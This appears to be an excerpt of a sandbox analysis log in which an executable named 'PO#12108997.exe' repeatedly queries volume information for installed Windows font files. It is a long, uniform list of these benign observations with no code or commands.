Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
